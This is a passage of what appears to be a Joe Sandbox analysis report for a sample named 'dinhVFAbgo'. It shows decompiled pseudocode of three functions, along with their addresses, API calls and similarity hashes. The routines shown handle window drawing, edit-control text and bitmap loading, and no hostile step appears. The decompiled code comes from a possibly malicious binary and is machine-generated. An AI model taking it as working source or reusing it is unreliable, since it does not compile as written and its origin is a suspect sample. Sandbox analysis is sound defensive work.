				_t157 = _a52;
				if(_a48 != 0 || _t157 != 0) {
					E00CDCDB3(_t129,  &_a24);
					InflateRect( &_v32, 0xffffffff, 0xfffffffe);
				}
				_t77 = _v36;
				_t175 = _t77 - 0xffffffff;
				if(_t77 != 0xffffffff) {
					_push(_t77);
					E00CB8F99( &_v44, _t154, _t157, _t161, _t175);
					FillRect( *(_t129 + 4),  &_v32, _v40);
					_v44 = 0xe1966c;
					E00CB91F0( &_v44, _t154);
				}
				_t78 = E00CC19ED();
				_t162 = _a44;
				_t79 =  *((intOrPtr*)(_t78 + 0x20));
				if(_a40 == 0 || _t162 == 0) {
					_push(_t79);
					_push(1);
					_push(0);
					E00CB909B(_t129,  &_v52, _t154, _t157, _t162, __eflags);
					_v4 = _v4 & 0x00000000;
					_t133 = _t129;
					_t82 = E00CBA2B8(_t133,  &_v52);
					_v36 = _t82;
					__eflags = _t82;
					if(__eflags == 0) {
						E00CAA4E7(_t129, _t133, _t157, _t162, __eflags);
						asm("int3");
						_push(_t129);
						_t130 = _a8;
						_push(_t162);
						_push(_t157);
						_t158 = _t133;
						__eflags =  *(_t130 + 0xc4);
						_push(_t130);
						_push(_a4);
						_t163 =  *_t158;
						if( *(_t130 + 0xc4) == 0) {
							_t164 =  *((intOrPtr*)(_t163 + 0x230));
						} else {
							 *0xe17a64();
							 *((intOrPtr*)( *((intOrPtr*)(_t163 + 0x238))))();
							 *0xe17a64(_a4, _t130);
							 *((intOrPtr*)( *((intOrPtr*)( *_t158 + 0x230))))();
							_push(_t130);
							_push(_a4);
							_t164 =  *((intOrPtr*)( *_t158 + 0x240));
						}
						 *0xe17a64();
						return  *_t164();
					} else {
						E00CB9F54(_t129,  &_v60, _a24, _a28);
						E00CB9F1F(_t129, _a24, _a36);
						E00CB9F54(_t129,  &_v60, _a32 - 1, _a28);
						E00CB9F1F(_t129, _a32 - 1, _a36);
						__eflags = _a40;
						if(_a40 != 0) {
							E00CB9F54(_t129,  &_v60, _a24, _a28);
							E00CB9F1F(_t129, _a32, _a28);
						}
						__eflags = _t162;
						if(_t162 != 0) {
							E00CB9F54(_t129,  &_v60, _a24, _a36 - 1);
							__eflags = _a36 - 1;
							E00CB9F1F(_t129, _a32, _a36 - 1);
						}
						E00CBA2B8(_t129, _v36);
						_t49 =  &_v4;
						 *_t49 = _v4 | 0xffffffff;
						__eflags =  *_t49;
						_v52 = 0xe19640;
						E00CB91F0( &_v52, _t154);
						goto L14;
					}
				} else {
					E00CC0750( &_a24, _t79, _t79);
					L14:
					if(_a48 == 0) {
						__eflags = _t157;
						if(_t157 != 0) {
							_t162 =  *(E00CC19ED() + 0x5c);
							_t107 =  *(E00CC19ED() + 0x58);
							goto L18;
						}
					} else {
						_t162 =  *(E00CC19ED() + 0x58);
						_t107 =  *(E00CC19ED() + 0x5c);
						L18:
						E00CC0750( &_a24, _t107, _t162);
					}
					return E00DDD50E(_t129, _t157, _t162);
				}
			}

0x00ce9326
0x00ce9326
0x00ce932d
0x00ce9335
0x00ce9338
0x00ce933e
0x00ce9341
0x00ce9349
0x00ce934b
0x00ce934c
0x00ce934d
0x00ce9357
0x00ce935a
0x00ce9365
0x00ce9372
0x00ce9372
0x00ce9378
0x00ce937b
0x00ce937e
0x00ce9380
0x00ce9384
0x00ce9393
0x00ce939c
0x00ce93a3
0x00ce93a3
0x00ce93a8
0x00ce93b1
0x00ce93b4
0x00ce93b7
0x00ce93cf
0x00ce93d0
0x00ce93d2
0x00ce93d7
0x00ce93dc
0x00ce93e4
0x00ce93e6
0x00ce93eb
0x00ce93ee
0x00ce93f0
0x00ce94de
0x00ce94e3
0x00ce94e7
0x00ce94e8
0x00ce94eb
0x00ce94ec
0x00ce94ed
0x00ce94ef
0x00ce94f6
0x00ce94f7
0x00ce94fa
0x00ce94fc
0x00ce9536
0x00ce94fe
0x00ce9506
0x00ce950e
0x00ce951e
0x00ce9526
0x00ce952a
0x00ce952b
0x00ce952e
0x00ce952e
0x00ce953e
0x00ce954c
0x00ce93f6
0x00ce9402
0x00ce940f
0x00ce9422
0x00ce9431
0x00ce9436
0x00ce943a
0x00ce9448
0x00ce9455
0x00ce9455
0x00ce945a
0x00ce945c
0x00ce946c
0x00ce9476
0x00ce947b
0x00ce947b
0x00ce9485
0x00ce948a
0x00ce948a
0x00ce948a
0x00ce9491
0x00ce9498
0x00000000
0x00ce9498
0x00ce93bd
0x00ce93c5
0x00ce949d
0x00ce94a1
0x00ce94b5
0x00ce94b7
0x00ce94be
0x00ce94c6
0x00000000
0x00ce94c6
0x00ce94a3
0x00ce94a8
0x00ce94b0
0x00ce94c9
0x00ce94d1
0x00ce94d1
0x00ce94db
0x00ce94db

APIs

__EH_prolog3_GS.LIBCMT ref: 00CE932D
InflateRect.USER32(?,000000FF,00000000), ref: 00CE934D
InflateRect.USER32(?,000000FF,000000FE), ref: 00CE9372
FillRect.USER32 ref: 00CE9393

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$Inflate$FillH_prolog3_
String ID:
API String ID: 3515757206-0
Opcode ID: 1c54d6beb327dda3f31a0600f466b14b2b346c3ebe5673ef6ac6255d2194ec0a
Instruction ID: 81a36438030b926950c57f1e20bb431d72f0272881c5e90894adfa68c30f13e6
Opcode Fuzzy Hash: 1c54d6beb327dda3f31a0600f466b14b2b346c3ebe5673ef6ac6255d2194ec0a
Instruction Fuzzy Hash: C5616C71A00209AFCF05EFA5C885EEE77BAEF08364F104125FD15A72A1CB349E45DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CCC35C Relevance: 6.2, APIs: 4, Instructions: 185
windowCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00CCC35C(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t96;
				void* _t106;
				void* _t107;
				void* _t108;
				void* _t111;
				void* _t113;
				intOrPtr _t116;
				void* _t122;
				void* _t135;
				void* _t137;
				void* _t138;
				intOrPtr _t143;
				void* _t145;
				void* _t152;
				intOrPtr* _t180;
				intOrPtr _t181;
				intOrPtr _t184;
				intOrPtr _t185;
				intOrPtr _t187;
				void* _t189;
				void* _t192;

				_t192 = __eflags;
				E00DDD52C(0xe09a03, __ebx, __edi, __esi);
				_t145 = __ecx;
				_t180 = 1;
				 *((intOrPtr*)(__ecx + 0xa4)) = 1;
				SendMessageA( *(__ecx + 0x20), 0xb0, _t189 - 0x10, _t189 - 0x38);
				E00CB236A(_t145, _t145, _t192, 0x2c);
				SendMessageA( *(_t145 + 0x20), 0xb0, _t189 - 0x2c, _t189 - 0x18);
				_t96 =  *(_t189 - 0x2c);
				if(_t96 >  *(_t189 - 0x18)) {
					 *(_t189 - 0x18) = _t96;
				}
				E00CA67E1(_t189 - 0x24);
				_t184 = 0;
				 *((intOrPtr*)(_t189 - 4)) = 0;
				E00CB2D00(_t145, _t189 - 0x24);
				E00CA7B78(_t189 - 0x24, _t189 - 0x28,  *(_t189 - 0x10),  *(_t189 - 0x18) -  *(_t189 - 0x10));
				E00CA67E1(_t189 - 0x14);
				_t152 = _t145;
				 *((intOrPtr*)(_t189 - 0x1c)) =  *(_t189 - 0x10);
				_t106 = _t189 - 0x30;
				 *((char*)(_t189 - 4)) = 2;
				_t194 =  *((intOrPtr*)(_t145 + 0x98));
				if( *((intOrPtr*)(_t145 + 0x98)) == 0) {
					_t107 = E00CCAD16(_t152, _t106);
					 *((char*)(_t189 - 4)) = 4;
					_t108 = E00CA68A8(_t189 - 0x14, _t107);
					 *((char*)(_t189 - 4)) = 2;
					E00CA2975(_t108,  *((intOrPtr*)(_t189 - 0x30)) - 0x10);
				} else {
					_push(_t180);
					_push(_t106);
					_t137 = E00CCAC5B(_t145, _t152, _t180, 0, _t194);
					 *((char*)(_t189 - 4)) = 3;
					_t138 = E00CA68A8(_t189 - 0x14, _t137);
					 *((char*)(_t189 - 4)) = 2;
					E00CA2975(_t138,  *((intOrPtr*)(_t189 - 0x30)) - 0x10);
					if( *((intOrPtr*)( *((intOrPtr*)(_t145 + 0x84)) - 0xc)) != 0) {
						_t180 = _t145 + 0x88;
						if( *((intOrPtr*)( *_t180 - 0xc)) > 0) {
							while(_t184 <  *(_t189 - 0x10)) {
								if(E00CAAF63(_t180, _t184) != 0x5f) {
									 *((intOrPtr*)(_t189 - 0x1c)) =  *((intOrPtr*)(_t189 - 0x1c)) - 1;
								}
								_t143 =  *_t180;
								_t184 = _t184 + 1;
								_t200 = _t184 -  *((intOrPtr*)(_t143 - 0xc));
								if(_t184 <  *((intOrPtr*)(_t143 - 0xc))) {
									continue;
								} else {
								}
								goto L11;
							}
						}
					}
				}
				L11:
				_t185 =  *((intOrPtr*)(_t189 - 0x1c));
				_t111 = E00CA91DA(_t145, _t189 - 0x14, _t189 - 0x30, _t185);
				 *((char*)(_t189 - 4)) = 5;
				_push(_t189 - 0x28);
				_push(_t111);
				_push(_t189 - 0x20);
				_t113 = E00CC2389(_t145, _t180, _t185, _t200);
				 *((char*)(_t189 - 4)) = 7;
				E00CA2975(_t113,  *((intOrPtr*)(_t189 - 0x30)) - 0x10);
				_t181 =  *((intOrPtr*)(_t189 - 0x28));
				if( *((intOrPtr*)( *((intOrPtr*)(_t145 + 0x84)) - 0xc)) == 0) {
					_t116 = 0;
					__eflags = 0;
				} else {
					_t116 =  *((intOrPtr*)(_t181 - 0xc));
				}
				_t160 = _t116 + _t185;
				_t187 =  *((intOrPtr*)(_t189 - 0x14)) + 0xfffffff0;
				 *((intOrPtr*)(_t189 - 0x34)) = _t187;
				_t117 =  *((intOrPtr*)(_t187 + 4));
				if(_t116 + _t185 <  *((intOrPtr*)(_t187 + 4))) {
					E00CA7B78(_t189 - 0x14, _t189 - 0x1c, _t160, _t117 - _t160);
					 *((char*)(_t189 - 4)) = 8;
					_push( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x1c)) - 0xc)));
					_t135 = E00CA93E8(_t145, _t189 - 0x20, _t181,  *((intOrPtr*)(_t189 - 0x1c)));
					 *((char*)(_t189 - 4)) = 7;
					E00CA2975(_t135,  *((intOrPtr*)(_t189 - 0x1c)) - 0x10);
					_t187 =  *((intOrPtr*)(_t189 - 0x34));
				}
				_push(0 |  *((intOrPtr*)(_t145 + 0x98)) == 0x00000000);
				_push( *((intOrPtr*)(_t189 - 0x20)));
				if(E00CCC6DA(_t145, _t145, _t181, _t187,  *((intOrPtr*)(_t145 + 0x98))) == 0) {
					MessageBeep(0xffffffff);
				}
				E00CB7AE0(_t145,  *((intOrPtr*)(_t145 + 0x80)));
				if( *((intOrPtr*)(_t145 + 0x9c)) != 0) {
					E00CCAB29(_t145, _t189 - 0x10, _t189 - 0x38,  *(_t189 - 0x10), 1);
				}
				_t122 = E00CCC671(_t145,  *(_t189 - 0x10),  *(_t189 - 0x10), 0);
				 *(_t145 + 0xa4) =  *(_t145 + 0xa4) & 0x00000000;
				return E00DDD4FA(E00CA2975(E00CA2975(E00CA2975(E00CA2975(_t122,  *((intOrPtr*)(_t189 - 0x20)) - 0x10), _t187), _t181 - 0x10),  *((intOrPtr*)(_t189 - 0x24)) - 0x10));
			}

0x00ccc35c
0x00ccc363
0x00ccc368
0x00ccc37d
0x00ccc37e
0x00ccc384
0x00ccc38c
0x00ccc39d
0x00ccc3a3
0x00ccc3a9
0x00ccc3ab
0x00ccc3ab
0x00ccc3b1
0x00ccc3b9
0x00ccc3be
0x00ccc3c1
0x00ccc3d7
0x00ccc3df
0x00ccc3e4
0x00ccc3e9
0x00ccc3ec
0x00ccc3ef
0x00ccc3f3
0x00ccc3f9
0x00ccc455
0x00ccc45e
0x00ccc462
0x00ccc46a
0x00ccc471
0x00ccc3fb
0x00ccc3fb
0x00ccc3fc
0x00ccc3fd
0x00ccc406
0x00ccc40a
0x00ccc412
0x00ccc419
0x00ccc427
0x00ccc429
0x00ccc434
0x00ccc436
0x00ccc445
0x00ccc447
0x00ccc447
0x00ccc44a
0x00ccc44c
0x00ccc44d
0x00ccc450
0x00000000
0x00000000
0x00ccc452
0x00000000
0x00ccc450
0x00ccc436
0x00ccc434
0x00ccc427
0x00ccc476
0x00ccc476
0x00ccc481
0x00ccc489
0x00ccc48d
0x00ccc48e
0x00ccc492
0x00ccc493
0x00ccc49e
0x00ccc4a5
0x00ccc4b0
0x00ccc4b7
0x00ccc4be
0x00ccc4be
0x00ccc4b9
0x00ccc4b9
0x00ccc4b9
0x00ccc4c0
0x00ccc4c6
0x00ccc4c9
0x00ccc4cc
0x00ccc4d1
0x00ccc4de
0x00ccc4e9
0x00ccc4ed
0x00ccc4f1
0x00ccc4f9
0x00ccc4fd
0x00ccc502
0x00ccc502
0x00ccc512
0x00ccc513
0x00ccc51d
0x00ccc521
0x00ccc521
0x00ccc52f
0x00ccc53b
0x00ccc54c
0x00ccc54c
0x00ccc55b
0x00ccc563
0x00ccc591

APIs

__EH_prolog3.LIBCMT ref: 00CCC363
SendMessageA.USER32(?,000000B0,?,?), ref: 00CCC384
SendMessageA.USER32(?,000000B0,?,?), ref: 00CCC39D

Part of subcall function 00CCC6DA: __EH_prolog3.LIBCMT ref: 00CCC6E1

MessageBeep.USER32(000000FF), ref: 00CCC521

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Message$H_prolog3Send$Beep
String ID:
API String ID: 2615041054-0
Opcode ID: 0a18996969f1c7dcb88805ce0332d26f21736da97e7301073aa74f31ae61fe0b
Instruction ID: 2672c9171e2875666c678b3e56d78cb80513b8356fb671bf2a58ef13536679ab
Opcode Fuzzy Hash: 0a18996969f1c7dcb88805ce0332d26f21736da97e7301073aa74f31ae61fe0b
Instruction Fuzzy Hash: 96717A3190111AAFDF05DFA4C895EFEB7B9FF09304F144069E856B7292DB34AA08DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CDE6EF Relevance: 6.2, APIs: 4, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00CDE6EF(void* __ebx, int __ecx, signed int __edi, void* __esi, void* __eflags, signed int _a8) {
				void* _v0;
				signed int _v4;
				signed int _v8;
				signed int _v12;
				void* _v16;
				WCHAR* _v20;
				struct HINSTANCE__* _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed short _v50;
				void _v68;
				signed int _v72;
				short _v74;
				signed int _v84;
				signed int _v88;
				void _v96;
				void* _t113;
				signed int _t118;
				signed int _t121;
				void* _t122;
				signed int _t132;
				intOrPtr* _t134;
				signed int _t136;
				signed int _t148;
				signed int _t151;
				int _t153;
				intOrPtr _t155;
				signed int _t159;
				signed int _t163;
				signed int _t164;
				signed short _t168;
				signed int _t175;
				signed char* _t183;
				void* _t186;
				intOrPtr* _t187;
				intOrPtr* _t188;
				signed int _t190;
				int _t191;
				signed int _t196;
				signed int _t198;
				long long _t210;

				_t181 = __edi;
				_push(0x38);
				_t108 = E00DDD52C(0xe0a9d2, __ebx, __edi, __esi);
				_t153 = __ecx;
				_t175 = 0;
				if( *((intOrPtr*)(__ecx + 0x28)) != 0) {
					L14:
					return E00DDD4FA(_t108);
				} else {
					_t210 =  *((long long*)(__ecx + 0xb8));
					asm("fld1");
					asm("fucom st1");
					asm("fnstsw ax");
					st1 = _t210;
					if((_t108 & 0x00000044) != 0) {
						st0 = _t210;
					} else {
						_t151 =  *(__ecx + 0xac);
						 *((intOrPtr*)(__ecx + 8)) = 0;
						 *((long long*)(__ecx + 0xb8)) = _t210;
						if(_t151 != 0xffffffff) {
							 *(__ecx + 0xac) =  *(__ecx + 0xac) | 0xffffffff;
							 *(__ecx + 0xa8) = _t151;
						}
						_v44 = _t175;
						_v40 = _t175;
						_v36 = _t175;
						_v32 = _t175;
						asm("movsd");
						_t108 =  *(_t153 + 0x5c);
						 *(_t153 + 0x54) =  *(_t153 + 0x5c);
						asm("movsd");
						 *(_t153 + 0x58) =  *(_t153 + 0x60);
						 *(_t153 + 0x5c) = _t175;
						 *(_t153 + 0x60) = _t175;
						asm("movsd");
						 *(_t153 + 0x64) = _t175;
						 *(_t153 + 0x68) = _t175;
						asm("movsd");
						_v44 = _t175;
						_t181 = _t153 + 0x7c;
						_v40 = _t175;
						_v36 = _t175;
						_v32 = _t175;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t186 = _t153 + 0x8c;
					if( *_t186 == _t175) {
						L9:
						E00CDF694(_t153);
						_t208 =  *0xe872e8;
						if( *0xe872e8 != 0) {
							E00CDE16A(_t153, _t181, _t186, _t208, _t186,  *(_t153 + 0x54));
						}
						_t187 = _t153 + 0x90;
						E00CB83BD(_t181, _t187);
						 *_t187 = 0;
						_t188 = _t153 + 0x94;
						E00CB83BD(0, _t188);
						 *_t188 = 0;
						_t209 =  *((intOrPtr*)(_t153 + 0x30));
						if( *((intOrPtr*)(_t153 + 0x30)) != 0) {
							E00CDCF04(_t153, _t153, 0, _t188, _t209, _t210,  *((intOrPtr*)(_t153 + 0xc)));
						}
						_t113 = E00CC19ED();
						_t108 =  *(_t113 + 0x20);
						 *(_t153 + 0xb0) =  *(_t113 + 0x20);
						goto L14;
					} else {
						_t207 =  *((intOrPtr*)(_t153 + 0x18)) - _t175;
						if( *((intOrPtr*)(_t153 + 0x18)) == _t175) {
							__eflags =  *((intOrPtr*)(_t153 + 0xcc)) - _t175;
							if( *((intOrPtr*)(_t153 + 0xcc)) == _t175) {
								goto L14;
							} else {
								E00CB83BD(_t181, _t186);
								_t181 =  *(_t153 + 0xc4);
								_t159 =  *(_t153 + 0xe0);
								__eflags = _t181;
								if(_t181 == 0) {
									goto L9;
								} else {
									while(1) {
										__eflags = _t159;
										if(__eflags == 0) {
											break;
										}
										_t175 =  *(_t181 + 8);
										_t181 =  *_t181;
										__eflags = _t175;
										if(__eflags == 0) {
											break;
										} else {
											_v32 = _v32 & 0x00000000;
											_v28 =  *_t159;
											_v24 =  *((intOrPtr*)(_t159 + 8));
											_v36 = 0xe1f2ec;
											_v4 = _v4 & 0x00000000;
											_v20 = _t175 & 0x0000ffff;
											_t136 = E00CDD9D4( &_v36, _t175, _t210, _t175 & 0x0000ffff,  *((intOrPtr*)(_t159 + 8)));
											__eflags = _t136;
											if(_t136 == 0) {
												L21:
												__eflags =  *(_t153 + 0x34);
												_t191 = 0x2000;
												if( *(_t153 + 0x34) != 0) {
													_t148 = E00CDD470(E00CC19ED());
													__eflags = _t148;
													if(_t148 == 0) {
														_t191 = 0x3000;
													}
												}
												__eflags = 0;
												_t186 = LoadImageW(_v24, _v20, 0, 0, 0, _t191);
												_v16 = _t186;
											} else {
												_t186 = E00CB9D20(_t153,  &_v36);
												_v16 = _t186;
												__eflags = _t186;
												if(_t186 == 0) {
													goto L21;
												}
											}
											GetObjectA(_t186, 0x18,  &_v68);
											_t168 = _v50;
											 *(_t153 + 8) = _t168 & 0x0000ffff;
											__eflags = _t168 - 0x20;
											if(__eflags < 0) {
												__eflags = _t168 - 8;
												if(_t168 <= 8) {
													L29:
													__eflags =  *(E00CC19ED() + 0x184);
													if(__eflags != 0) {
														goto L30;
													}
												} else {
													__eflags =  *(_t153 + 0x34);
													if(__eflags != 0) {
														L30:
														_push(0xffffffff);
														_push(0xffffffff);
														_push(0);
														_push( &_v16);
														L00CDDD45(_t153, _t175, _t181, _t186, __eflags, _t210);
														_t186 = _v16;
													} else {
														goto L29;
													}
												}
											} else {
												_push( *((intOrPtr*)(_t153 + 0x3c)));
												_push(_t186);
												L34();
											}
											_push(0);
											_push(_t186);
											L00CDAB41(_t153, _t153, _t181, _t186, __eflags, _t210);
											DeleteObject(_t186);
											_v4 = _v4 | 0xffffffff;
											_v36 = 0xe196b4;
											E00CB91F0( &_v36, _t175);
											_t159 = _v28;
											__eflags = _t181;
											if(_t181 != 0) {
												continue;
											} else {
												_t186 = _t153 + 0x8c;
												goto L9;
											}
										}
										goto L52;
									}
									E00CAA4E7(_t153, _t159, _t181, _t186, __eflags);
									asm("int3");
									_t196 = _t198;
									_t118 =  *0xe68dd4; // 0x8d2643c2
									_v12 = _t118 ^ _t196;
									_t121 = GetObjectA(_v0, 0x54,  &_v96);
									__eflags = _t121;
									if(_t121 == 0) {
										L50:
										_t122 = 0;
										__eflags = 0;
									} else {
										__eflags = _v74 - 0x20;
										if(_v74 != 0x20) {
											goto L50;
										} else {
											_t163 = _v72;
											__eflags = _t163;
											if(_t163 == 0) {
												goto L50;
											} else {
												_push(_t153);
												_push(_t186);
												_t190 = _v84 * _v88;
												__eflags = _a8;
												if(_a8 == 0) {
													__eflags = _t190;
													if(_t190 > 0) {
														goto L46;
													}
												} else {
													_t175 = 0;
													__eflags = _t190;
													if(_t190 > 0) {
														_t83 = _t163 + 2; // 0x12
														_t134 = _t83;
														while(1) {
															_t155 =  *((intOrPtr*)(_t134 + 1));
															__eflags =  *_t134 - _t155;
															if( *_t134 > _t155) {
																break;
															}
															__eflags =  *((intOrPtr*)(_t134 - 1)) - _t155;
															if( *((intOrPtr*)(_t134 - 1)) > _t155) {
																break;
															} else {
																__eflags =  *((intOrPtr*)(_t134 - 2)) - _t155;
																if( *((intOrPtr*)(_t134 - 2)) > _t155) {
																	break;
																} else {
																	_t134 = _t134 + 4;
																	_t175 = _t175 + 1;
																	__eflags = _t175 - _t190;
																	if(_t175 < _t190) {
																		continue;
																	} else {
																	}
																}
															}
															goto L49;
														}
														L46:
														_push(_t181);
														_t87 = _t163 + 2; // 0x12
														_t183 = _t87;
														do {
															_t164 = _t183[1] & 0x000000ff;
															 *_t183 = ( *_t183 & 0x000000ff) * _t164 / 0xff;
															_t183 =  &(_t183[4]);
															 *(_t183 - 5) = ( *(_t183 - 5) & 0x000000ff) * _t164 / 0xff;
															_t132 = ( *(_t183 - 6) & 0x000000ff) * _t164;
															_t175 = _t132 % 0xff;
															 *(_t183 - 6) = _t132 / 0xff;
															_t190 = _t190 - 1;
															__eflags = _t190;
														} while (_t190 != 0);
														_pop(_t181);
													}
												}
												L49:
												_pop(_t186);
												_t122 = 1;
												_pop(_t153);
											}
										}
									}
									__eflags = _v8 ^ _t196;
									return E00DDCBCE(_t122, _t153, _v8 ^ _t196, _t175, _t181, _t186);
								}
							}
						} else {
							E00CDD51E(_t153, _t153, _t175, _t181, _t186, _t207, _t210,  *((intOrPtr*)(_t153 + 0x98)), _t175);
							goto L9;
						}
					}
				}
				L52:
			}

0x00cde6ef
0x00cde6ef
0x00cde6f6
0x00cde6fb
0x00cde6fd
0x00cde702
0x00cde7f5
0x00cde7fa
0x00cde708
0x00cde708
0x00cde70e
0x00cde710
0x00cde712
0x00cde714
0x00cde719
0x00cde782
0x00cde71b
0x00cde71b
0x00cde721
0x00cde724
0x00cde72d
0x00cde72f
0x00cde736
0x00cde736
0x00cde73c
0x00cde742
0x00cde748
0x00cde74b
0x00cde74e
0x00cde74f
0x00cde755
0x00cde758
0x00cde759
0x00cde75c
0x00cde75f
0x00cde762
0x00cde763
0x00cde766
0x00cde769
0x00cde76a
0x00cde76d
0x00cde770
0x00cde776
0x00cde779
0x00cde77c
0x00cde77d
0x00cde77e
0x00cde77f
0x00cde77f
0x00cde784
0x00cde78c
0x00cde7a1
0x00cde7a3
0x00cde7a8
0x00cde7af
0x00cde7b5
0x00cde7b5
0x00cde7ba
0x00cde7c1
0x00cde7c8
0x00cde7ca
0x00cde7d1
0x00cde7d6
0x00cde7d8
0x00cde7db
0x00cde7e2
0x00cde7e2
0x00cde7e7
0x00cde7ec
0x00cde7ef
0x00000000
0x00cde78e
0x00cde78e
0x00cde791
0x00cde7fb
0x00cde801
0x00000000
0x00cde803
0x00cde804
0x00cde809
0x00cde80f
0x00cde815
0x00cde817
0x00000000
0x00cde819
0x00cde819
0x00cde819
0x00cde81b
0x00000000
0x00000000
0x00cde821
0x00cde824
0x00cde826
0x00cde828
0x00000000
0x00cde82e
0x00cde833
0x00cde837
0x00cde83a
0x00cde83d
0x00cde844
0x00cde84c
0x00cde853
0x00cde858
0x00cde85a
0x00cde86d
0x00cde86d
0x00cde871
0x00cde876
0x00cde87f
0x00cde884
0x00cde886
0x00cde888
0x00cde888
0x00cde886
0x00cde88e
0x00cde89f
0x00cde8a1
0x00cde85c
0x00cde864
0x00cde866
0x00cde869
0x00cde86b
0x00000000
0x00000000
0x00cde86b
0x00cde8ab
0x00cde8b1
0x00cde8b8
0x00cde8bb
0x00cde8bf
0x00cde8cc
0x00cde8d0
0x00cde8d8
0x00cde8dd
0x00cde8e4
0x00000000
0x00000000
0x00cde8d2
0x00cde8d2
0x00cde8d6
0x00cde8e6
0x00cde8e6
0x00cde8e8
0x00cde8ea
0x00cde8ef
0x00cde8f0
0x00cde8f5
0x00000000
0x00000000
0x00000000
0x00cde8d6
0x00cde8c1
0x00cde8c1
0x00cde8c4
0x00cde8c5
0x00cde8c5
0x00cde8f8
0x00cde8fa
0x00cde8fd
0x00cde903
0x00cde909
0x00cde910
0x00cde917
0x00cde91c
0x00cde91f
0x00cde921
0x00000000
0x00cde927
0x00cde927
0x00000000
0x00cde927
0x00cde921
0x00000000
0x00cde828
0x00cde932
0x00cde937
0x00cde939
0x00cde93e
0x00cde945
0x00cde952
0x00cde958
0x00cde95a
0x00cde9ee
0x00cde9ee
0x00cde9ee
0x00cde960
0x00cde960
0x00cde965
0x00000000
0x00cde96b
0x00cde96b
0x00cde96e
0x00cde970
0x00000000
0x00cde972
0x00cde972
0x00cde973
0x00cde977
0x00cde97b
0x00cde97f
0x00cde9a5
0x00cde9a7
0x00000000
0x00000000
0x00cde981
0x00cde981
0x00cde983
0x00cde985
0x00cde987
0x00cde987
0x00cde98a
0x00cde98a
0x00cde98d
0x00cde98f
0x00000000
0x00000000
0x00cde991
0x00cde994
0x00000000
0x00cde996
0x00cde996
0x00cde999
0x00000000
0x00cde99b
0x00cde99b
0x00cde99e
0x00cde99f
0x00cde9a1
0x00000000
0x00000000
0x00cde9a3
0x00cde9a1
0x00cde999
0x00000000
0x00cde994
0x00cde9a9
0x00cde9a9
0x00cde9aa
0x00cde9aa
0x00cde9b2
0x00cde9b2
0x00cde9c2
0x00cde9c4
0x00cde9d2
0x00cde9d9
0x00cde9dc
0x00cde9de
0x00cde9e1
0x00cde9e1
0x00cde9e1
0x00cde9e6
0x00cde9e6
0x00cde985
0x00cde9e7
0x00cde9e9
0x00cde9ea
0x00cde9eb
0x00cde9eb
0x00cde970
0x00cde965
0x00cde9f3
0x00cde9fb
0x00cde9fb
0x00cde817
0x00cde793
0x00cde79c
0x00000000
0x00cde79c
0x00cde791
0x00cde78c
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 00CDE6F6
LoadImageW.USER32 ref: 00CDE899
GetObjectA.GDI32(00000000,00000018,?), ref: 00CDE8AB
DeleteObject.GDI32(00000000), ref: 00CDE903

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Object$DeleteH_prolog3ImageLoad
String ID:
API String ID: 91933946-0
Opcode ID: 5758c0ae5a13fc523fb2634c5e044d354c6a717033565c300dd935aa75573d94
Instruction ID: c8c760f9162dd9b9340d77147445577c4f88d9ba81da3794a5c7e0aee1c1c8d5
Opcode Fuzzy Hash: 5758c0ae5a13fc523fb2634c5e044d354c6a717033565c300dd935aa75573d94
Instruction Fuzzy Hash: 8571AD718002158FCF15EF58C8807EEBBB5BF48310F14816AED656F396DB308A45DBA0

Uniqueness

Uniqueness Score: -1.00%

